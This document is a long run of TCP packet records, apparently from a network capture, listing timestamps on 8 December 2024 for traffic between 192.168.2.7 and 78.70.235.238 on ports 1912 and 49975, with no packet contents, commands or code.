                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.334940910 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.334949017 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.334958076 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.388945103 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.389278889 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.389288902 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.389420033 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.389430046 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.389437914 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.389441967 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.389446020 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.451225996 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.451246023 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.451320887 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.451428890 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.451438904 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.451491117 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.451500893 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.451508999 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.451596022 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.451632023 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.451802015 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.451811075 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.451942921 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.451993942 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.452080011 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.452157974 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.452205896 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.452217102 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.452225924 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.452316999 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.452560902 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.452651024 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.452807903 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.452831030 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.452840090 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.452945948 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.452955008 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.452963114 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.453037977 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.453131914 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.453140974 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.453150034 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.453180075 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.453289032 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.453387976 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.453397989 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.453506947 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.453516006 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.453525066 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.453573942 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.453596115 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.453604937 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.453706026 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.453716040 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.453784943 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.453794956 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.453826904 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.453900099 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.453908920 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.453982115 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.454147100 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.454155922 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.454166889 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.454175949 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.454237938 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.454246044 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.454253912 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.454277992 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.454288006 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.454314947 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.454432964 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.454483986 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.454590082 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.454600096 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.454647064 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.454655886 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.454668999 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.454709053 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.454752922 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.454926014 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.454936028 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.454943895 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.455024004 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.455034018 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.455040932 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.455173969 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.455384016 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.455446959 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.574093103 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.574187994 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.574198008 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.574207067 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.574218035 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.574664116 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.574717999 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.575063944 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.575076103 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.575084925 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.575094938 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.575249910 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.575259924 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.575468063 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.575478077 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.575567007 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.575577974 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.575586081 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.575623989 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.575680017 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.575690031 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.575829029 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.575839043 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.575849056 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.575860977 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.575922012 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.575932980 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.575992107 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.576141119 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.576150894 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.576163054 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.576173067 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.576180935 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.576189995 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.576615095 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.576625109 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.577138901 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.577148914 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.577944040 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.578104019 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.578114033 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.578121901 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.578169107 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.578830004 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.578855038 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.578865051 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.579868078 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.579946995 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.579957008 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.580080986 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.580090046 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.580101967 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.580756903 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.580884933 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.580893993 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.580903053 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.581171036 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.581264019 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.581340075 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.581499100 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.581512928 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.581516981 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.582874060 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.583045959 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.583055019 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.583062887 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.583113909 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.583626032 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.583703041 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.583713055 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.583728075 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.584517002 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.584664106 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.584672928 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.584683895 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.584693909 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.585272074 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.585417986 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.585432053 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.585442066 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.586127043 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.586229086 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.586271048 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.586281061 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.586291075 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.586940050 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.586950064 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.587671041 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.587769032 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.587779045 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.587786913 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.587816000 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.589167118 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.589271069 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.589281082 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.589289904 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.589322090 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.590621948 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.590715885 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.590724945 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.590733051 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.592063904 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.592256069 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.592266083 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.592298031 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.592308044 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.592915058 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.592928886 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.593442917 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.593810081 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.593880892 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.700943947 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.701061010 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.701071024 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.701081038 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.701116085 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.701133966 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.701215029 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.701281071 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.701289892 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.701297998 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.701483011 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.701493025 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.701500893 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.701551914 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.701675892 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.701762915 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.701773882 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.701781988 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.701805115 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.701814890 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.701972961 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.701984882 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.701999903 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.702073097 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.702135086 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.702210903 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.702220917 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.702229977 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.702343941 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.702399969 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.702542067 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.702660084 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.702692032 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.702944994 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.702955008 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.702964067 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.702979088 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.703196049 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.703206062 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.703320980 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.703331947 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.703341961 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.703407049 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.703417063 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.703424931 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.703603983 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.703613997 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.703622103 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.703718901 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.703731060 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.703738928 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.703773975 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.703782082 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.703793049 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.704190016 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.704278946 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.714010954 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.714021921 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.714030981 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.714041948 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.714134932 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.714144945 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.714263916 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.714273930 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.714339972 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.714416981 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.714426994 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.714524984 CET19124997578.70.235.238192.168.2.7
